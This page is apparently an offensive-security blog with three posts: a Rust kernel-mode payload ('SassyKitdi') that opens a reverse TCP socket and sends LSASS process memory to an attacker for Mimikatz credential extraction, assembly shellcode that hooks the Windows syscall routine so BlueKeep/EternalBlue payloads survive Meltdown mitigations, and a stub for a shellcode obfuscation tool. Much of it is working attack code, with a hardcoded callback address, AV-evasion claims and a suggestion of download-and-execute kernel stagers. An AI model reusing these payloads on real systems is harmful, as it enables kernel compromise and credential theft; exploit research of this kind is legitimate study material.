zerosum0x0: shellcode

Saturday, August 15, 2020

SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

Introduction
Transport Driver Interface
Dumping LSASS from Kernel Mode
Shellcoding in Rust
- Compiler Optimizations
- Using High-Level Constructs
Conclusion

Introduction

This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). The payload can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, e.g. bad drivers. It is universal from (at least) Windows 2000 to Windows 10, and does not have to carry around weird DKOM offsets.

The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

tl;dr: PoC || GTFO GitHub

The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

Figure 0: An oversimplification of the SassyKitdi methodology.

I don't have every AV on hand to test against, obviously, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume that almost no antivirus currently available is able to detect the methodology.

Finally, I will discuss what future kernel mode rootkits could look like, if one took this example a couple of steps further. What's old is new again.

Transport Driver Interface

TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

Opening the TCP Device Object

TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.

pub type ZwCreateFile = extern "stdcall" fn(
    FileHandle:         PHANDLE,
    AccessMask:         ACCESS_MASK,
    ObjectAttributes:   POBJECT_ATTRIBUTES,
    IoStatusBlock:      PIO_STATUS_BLOCK,
    AllocationSize:     PLARGE_INTEGER,
    FileAttributes:     ULONG,
    ShareAccess:        ULONG,
    CreateDisposition:  ULONG,
    CreateOptions:      ULONG,
    EaBuffer:           PVOID,
    EaLength:           ULONG,
) -> NTSTATUS;

The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.

#[repr(C, packed)]
pub struct TDI_ADDRESS_IP {
    pub sin_port:   USHORT,
    pub in_addr:    ULONG,
    pub sin_zero:   [UCHAR; 8],
}

#[repr(C, packed)]
pub struct TA_ADDRESS {
    pub AddressLength:  USHORT,
    pub AddressType:    USHORT,
    pub Address:        TDI_ADDRESS_IP,
}

#[repr(C, packed)]
pub struct TRANSPORT_ADDRESS {
    pub TAAddressCount:     LONG,
    pub Address:            [TA_ADDRESS; 1],
}

The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.

Connecting to an Endpoint

After initial setup, the rest of TDI API is performed through IOCTLs to the device object associated with our File Objects.

TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:

#[repr(u8)]
pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
    TDI_ASSOCIATE_ADDRESS     = 0x1,
    TDI_CONNECT               = 0x3,
    TDI_SEND                  = 0x7,
    TDI_SET_EVENT_HANDLER     = 0xb,
}

Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

Get the Device Object from the File Object using IoGetRelatedDeviceObject()
Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
Set the opcode inside IO_STACK_LOCATION.MinorFunction
Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
Dispatch the IRP with IofCallDriver()
Wait for the operation to complete using KeWaitForSingleObject() (optional)

For the TDI_CONNECT operation, the IRP parameters include a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the address and port we want to connect to, both in big-endian (network) byte order.
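
To make the byte-order point concrete, here is a minimal sketch that derives the address and port values from a dotted-quad address and a host-order port. The helper names `ip_to_tdi` and `port_to_tdi` are invented for this illustration and are not part of the SassyKitdi code.

```rust
/// Pack four IPv4 octets so that their in-memory order is network order.
/// (Hypothetical helper, for illustration only.)
pub fn ip_to_tdi(octets: [u8; 4]) -> u32 {
    // from_ne_bytes keeps the octets in memory exactly as given.
    u32::from_ne_bytes(octets)
}

/// Convert a host-order port number to network (big-endian) order.
/// (Hypothetical helper, for illustration only.)
pub fn port_to_tdi(port: u16) -> u16 {
    port.to_be()
}
```

On a little-endian host such as x86/x64, `ip_to_tdi([192, 168, 1, 221])` evaluates to 0xdd01a8c0 and `port_to_tdi(64444)` to 0xBCFB, which are the constants passed to the connect call in the Rust example later in this post.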

Sending Data Over the Wire

If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
IoAllocateMdl() providing the buffer address and size
MmProbeAndLockPages() to page-in during the send operation
Dispatch the Send IRP
The I/O manager will unlock the pages and free the MDL
ExFreePool() the buffer (optional)

In this case the MDL is attached to the IRP. In the Parameters structure we can just set SendFlags to 0 and SendLength to the data size.

#[repr(C, packed)]
pub struct TDI_REQUEST_KERNEL_SEND {
    pub SendLength:    ULONG,
    pub SendFlags:     ULONG,
}

Dumping LSASS from Kernel Mode

LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and Kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS against dump attempts from user-mode. But we'll do it from the privilege of the kernel.

Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.

Obtaining Operating System Information

Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:

#[repr(C)]
pub struct RTL_OSVERSIONINFOW {
    pub dwOSVersionInfoSize:        ULONG,
    pub dwMajorVersion:             ULONG,
    pub dwMinorVersion:             ULONG,
    pub dwBuildNumber:              ULONG,
    pub dwPlatformId:               ULONG,
    pub szCSDVersion:               [UINT16; 128],    
}

Scraping All Memory Regions

Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().

pub type ZwQueryVirtualMemory = extern "stdcall" fn(
    ProcessHandle:              HANDLE,
    BaseAddress:                PVOID,
    MemoryInformationClass:     MEMORY_INFORMATION_CLASS,
    MemoryInformation:          PVOID,
    MemoryInformationLength:    SIZE_T,
    ReturnLength:               PSIZE_T,
) -> crate::types::NTSTATUS;

Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:

#[repr(C)]
pub struct MEMORY_BASIC_INFORMATION {
    pub BaseAddress:            PVOID,
    pub AllocationBase:         PVOID,
    pub AllocationProtect:      ULONG,
    pub PartitionId:            USHORT,
    pub RegionSize:             SIZE_T,
    pub State:                  ULONG,
    pub Protect:                ULONG,
    pub Type:                   ULONG,
}

For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.
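
The iteration can be sketched as follows. This is only a model of the loop: `query` is a hypothetical stand-in for the ZwQueryVirtualMemory() call (returning None for an NT error or a zero ReturnLength), and `Region` keeps just the two MEMORY_BASIC_INFORMATION fields the loop needs. The fixed-size output slice is an assumption made to avoid needing an allocator.

```rust
/// Minimal stand-in for the MEMORY_BASIC_INFORMATION fields used here.
#[derive(Clone, Copy, Debug, PartialEq)]
pub struct Region {
    pub base: usize,
    pub size: usize,
}

/// Walk the address space from 0 upward, storing regions into `out`.
/// Returns how many regions were recorded.
pub fn walk_regions<F>(mut query: F, out: &mut [Region]) -> usize
where
    F: FnMut(usize) -> Option<Region>,
{
    let mut addr = 0usize;
    let mut count = 0usize;
    while count < out.len() {
        // Stop on an error or an empty region.
        let region = match query(addr) {
            Some(r) if r.size != 0 => r,
            _ => break,
        };
        out[count] = region;
        count += 1;
        // Next BaseAddress = BaseAddress + RegionSize; stop on wrap-around.
        addr = match region.base.checked_add(region.size) {
            Some(next) => next,
            None => break,
        };
    }
    count
}
```

Passing the query as a closure keeps the loop testable outside the kernel; in the payload the closure body would wrap the real call.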

Collecting List of Loaded Modules

Mimikatz also needs to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr->InLoadOrderModuleList, which is a well-documented way to obtain the linked list of LDR_DATA_TABLE_ENTRY entries (chained through their InLoadOrderLinks field).

#[cfg(target_arch="x86_64")]
#[repr(C, packed)]
pub struct LDR_DATA_TABLE_ENTRY {
    pub InLoadOrderLinks:               LIST_ENTRY,
    pub InMemoryOrderLinks:             LIST_ENTRY,
    pub InInitializationOrderLinks:     LIST_ENTRY,
    pub DllBase:                        PVOID,
    pub EntryPoint:                     PVOID,
    pub SizeOfImage:                    ULONG,
    pub Padding_0x44_0x48:              [BYTE; 4],
    pub FullDllName:                    UNICODE_STRING,
    pub BaseDllName:                    UNICODE_STRING,
    /* ...etc... */
}

Just iterate the linked list until you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.
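
A minimal sketch of that circular walk, using a bare list node instead of the full loader structures. `ListEntry` and `for_each_entry` are names made up for this example. Because InLoadOrderLinks sits at offset 0, each visited pointer would double as a pointer to the enclosing LDR_DATA_TABLE_ENTRY in the real structure.

```rust
/// Same shape as the NT LIST_ENTRY: forward and backward links.
#[repr(C)]
pub struct ListEntry {
    pub flink: *mut ListEntry,
    pub blink: *mut ListEntry,
}

/// Call `visit` for every entry after `head`, stopping when the walk
/// arrives back at `head` (or hits a null link, as a defensive check).
///
/// Safety: `head` must point to a valid list whose links are readable.
pub unsafe fn for_each_entry<F>(head: *mut ListEntry, mut visit: F)
where
    F: FnMut(*mut ListEntry),
{
    let mut cur = unsafe { (*head).flink };
    while !cur.is_null() && cur != head {
        visit(cur);
        cur = unsafe { (*cur).flink };
    }
}
```

The head itself is skipped because in the PEB it lives inside the loader data block rather than inside a module entry.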

Notes on Shellcoding in Rust

Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-pc-windows-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

Here's an example of how nice shellcoding in Rust can be:

let mut socket = nttdi::TdiSocket::new(tdi_ctx);

socket.add_recv_handler(recv_handler);
socket.connect(0xdd01a8c0, 0xBCFB)?;  // 192.168.1.221:64444

socket.send("abc".as_bytes().as_ptr(), 3)?;

Compiler Optimizations

Rust sits atop LLVM, which lowers an intermediate representation into final machine code, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

We can set the Cargo.toml file to use opt-level='z' (optimize for size) and lto=true (link-time optimization) to further reduce generated code size.

Using High-Level Constructs

The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.
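
As a rough illustration of the RAII pattern (not the project's actual wrapper types), the sketch below owns an opaque handle value and runs a caller-supplied close routine when it goes out of scope. `HandleGuard` is a hypothetical name; in kernel code the closure would call something like ZwClose(). It uses only `core` features.

```rust
/// Hypothetical guard that owns `handle` and releases it on drop.
pub struct HandleGuard<F: FnMut(usize)> {
    handle: usize,
    close: F,
}

impl<F: FnMut(usize)> HandleGuard<F> {
    pub fn new(handle: usize, close: F) -> Self {
        HandleGuard { handle, close }
    }

    /// Borrow the raw handle value for use in API calls.
    pub fn raw(&self) -> usize {
        self.handle
    }
}

impl<F: FnMut(usize)> Drop for HandleGuard<F> {
    fn drop(&mut self) {
        // Runs automatically at end of scope, including on early returns.
        (self.close)(self.handle);
    }
}
```

Because the close routine runs on every exit path, an early return caused by an error cannot leak the handle.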

Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.
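
A small sketch of that error-bubbling style, under the assumption that NTSTATUS is modeled as a signed 32-bit value where negative means failure. `check` and `open_pair` are invented for this example; only the STATUS_SUCCESS and STATUS_UNSUCCESSFUL values are real NT constants.

```rust
#[allow(non_camel_case_types)]
pub type NTSTATUS = i32;

pub const STATUS_SUCCESS: NTSTATUS = 0;
pub const STATUS_UNSUCCESSFUL: NTSTATUS = 0xC0000001u32 as i32;

/// Map a raw NTSTATUS to a Result; error codes have the high bit set.
pub fn check(status: NTSTATUS) -> Result<(), NTSTATUS> {
    if status < 0 {
        Err(status)
    } else {
        Ok(())
    }
}

/// Hypothetical two-step operation. Each `?` returns early with the
/// failing NTSTATUS; on success a tuple comes back in the Ok slot.
pub fn open_pair(first: NTSTATUS, second: NTSTATUS) -> Result<(u32, u32), NTSTATUS> {
    check(first)?;
    check(second)?;
    Ok((1, 2))
}
```

Here the two parameters stand in for the statuses that real kernel calls would return.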

For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and not all edge cases are taken into account.

Conclusion

SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode Meterpreter-like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

Thursday, November 7, 2019

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background
Meltdown CPU Vulnerability
- KVA Shadow Mitigation
- KiSystemCall64Shadow Changes
Existing Remote Kernel Payloads
- Hooking IA32_LSTAR MSR
- Double Fault Root Cause Analysis
Hooking KiSystemCall64Shadow
Conclusion

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode
— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently break the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors load, evaluate, and branch ("speculate") well before these operations are "actually" due to run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

Swap to kernel GS segment
Save user stack to KPCR->Prcb.UserRspShadow
Check if KPCR->Prcb.ShadowFlags first bit is set
- Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

Existing Remote Kernel Payloads

The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

Hooking IA32_LSTAR MSR

In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc0000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

Double Fault Root Cause Analysis

Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with an UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

We can see that at this point, user mode can see the KiSystemCall64Shadow function:

However, user mode cannot see our shellcode location:

The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

Hooking KiSystemCall64Shadow

So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

Heuristic Offset Detection

We want to accomplish two things:

Install our hook in a spot after the kernel page tables are loaded into CR3.
Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2 bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

The following shellcode is the 0th stage that runs after exploitation:

payload_start:
; read IA32_LSTAR
    mov ecx, 0xc0000082         
    rdmsr

    shl rdx, 0x20
    or rax, rdx                 
    push rax

; rsi = &KiSystemCall64Shadow
    pop rsi                      

; this loop stores the offset to push 2b into ecx
_find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

_find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.
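
The same search can be modeled over an ordinary byte slice, which makes the offset arithmetic easier to see. This is a sketch for illustration, not part of the payload: `find_push2b` is a made-up name, and unlike the assembly loop it is bounded by the slice length and reports failure instead of scanning forever.

```rust
/// The heuristic pattern in memory order: 00, then 6a 2b (push 2b), then 65.
pub const PUSH2B_PATTERN: [u8; 4] = [0x00, 0x6a, 0x2b, 0x65];

/// Return the offset of the `push 2b` instruction inside `code`, if present.
pub fn find_push2b(code: &[u8]) -> Option<usize> {
    code.windows(PUSH2B_PATTERN.len())
        .position(|w| w == &PUSH2B_PATTERN[..])
        // The match starts on the stable leading 0x00 byte, so the
        // instruction itself begins one byte later.
        .map(|start| start + 1)
}
```

The `+ 1` mirrors the `inc ecx` before the `[rsi + rcx - 1]` compare in the assembly: the counter ends up pointing at the 0x6a byte rather than at the start of the pattern.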

The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

Atomic x64 Function Hooking

It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b instruction!

Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

; install hook call in KiSystemCall64Shadow NOP padding
install_big_jmp:

; bytes 90 57 48 bf (dword 0xbf485790) = nop; push rdi; movabs rdi, &fake_syscall_hook;
    mov dword [rsi - 0x10], 0xbf485790 
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

; bytes 57 c3 (word 0xc357) = push rdi; ret;
    mov word [rsi - 0x4], 0xc357

; ... 

fake_syscall_hook:

; ...

Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

; install tiny jmp to the NOP padding jmp
install_small_jmp:

; rsi = &syscall+push2b
    add rsi, rcx

; eax = jmp -x
; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

; push 2b => jmp -x;
    mov word [rsi], ax
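
The arithmetic in this listing is compact, so here is the same calculation written out as a sketch. A short jmp is encoded as EB followed by a signed 8-bit displacement measured from the end of the 2-byte instruction, and the target is the gadget 0x10 bytes before the routine. `small_jmp_word` and `GADGET_BACK` are names invented here, and the range check is an addition that the assembly does not perform.

```rust
/// Distance from the start of the routine back to the big jmp gadget.
pub const GADGET_BACK: u32 = 0x10;

/// Encode the 2-byte short jmp as the little-endian word that gets stored
/// over `push 2b`. Returns None if the target is out of rel8 range.
pub fn small_jmp_word(push2b_offset: u32) -> Option<u16> {
    // Bytes to travel backwards, counted from the end of the jmp.
    let back = push2b_offset.checked_add(2 + GADGET_BACK)?;
    if back > 128 {
        return None; // a rel8 displacement cannot go below -128
    }
    let rel8 = (back as u8).wrapping_neg();
    // Opcode EB in the low byte, displacement in the high byte.
    Some(u16::from_le_bytes([0xeb, rel8]))
}
```

For an offset of 0x20 this gives 0xceeb, the same value as 0xfeeb - (0x20 << 8) - 0x1000 in the assembly, where 0xfeeb is a jmp to itself (displacement -2).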

And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will go to the big jmp, which will go to our fake syscall handler at PASSIVE_LEVEL.

Cleaning Up the Hook

Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

; this syscall hook is called AFTER kernel stack+KVA shadow is setup
fake_syscall_hook:

; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

; use lock cmpxchg for queueing APC only one at a time
single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

; only 1 thread has this lock
; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

; all threads can clean up
_restore_syscall:

; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

All threads restore the push 2b, as the code flow results in fewer bytes, no extra locking, and shouldn't matter.
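
For readers less used to lock cmpxchg, the single_thread_gate in the listing above behaves like an atomic compare-and-swap on one byte. The sketch below models it with Rust's atomics; `try_enter` is a hypothetical name and the sequentially consistent ordering is a conservative choice for the example.

```rust
use core::sync::atomic::{AtomicU8, Ordering};

/// Returns true for exactly one caller: the first to flip the byte 0 -> 1.
/// Every later caller sees 1 already stored and gets false.
pub fn try_enter(gate: &AtomicU8) -> bool {
    gate.compare_exchange(0, 1, Ordering::SeqCst, Ordering::SeqCst)
        .is_ok()
}
```

A false result corresponds to the jnz _restore_syscall branch: the thread skips the APC queueing and goes straight to cleanup.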

Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

_syscall_hook_done:

; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

; rdi still holds push2b offset!
; but needs to be restored

; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

Conclusion

Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

It's simple, it's obvious, it's hacky; but it works and so it's what you want.

Thursday, August 17, 2017

Obfuscated String/Shellcode Generator - Online Tool

Options: ADD, SUB, XOR, SHIFT, NOT, NEG, MORPH. Input type: String or Shellcode, with a configurable number of rounds.

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");
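
For comparison, here is a rough Rust equivalent of those two replace calls. It is a sketch written for this page, not code from the tool: `clean_hex` is a made-up name, and it does both steps in a single left-to-right pass (skip any "0x"/"0X" prefix, then keep only hex digits).

```rust
/// Strip "0x"/"0X" prefixes and every non-hex character from `input`.
pub fn clean_hex(input: &str) -> String {
    let bytes = input.as_bytes();
    let mut out = String::new();
    let mut i = 0;
    while i < bytes.len() {
        // Drop a "0x" or "0X" prefix as a unit.
        if bytes[i] == b'0' && i + 1 < bytes.len() && (bytes[i + 1] | 0x20) == b'x' {
            i += 2;
            continue;
        }
        // Keep hex digits; everything else (commas, spaces, "\x") is dropped.
        if bytes[i].is_ascii_hexdigit() {
            out.push(bytes[i] as char);
        }
        i += 1;
    }
    out
}
```

With this, an input such as `0x41, 0X42 \x43` reduces to `414243`.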

About this tool

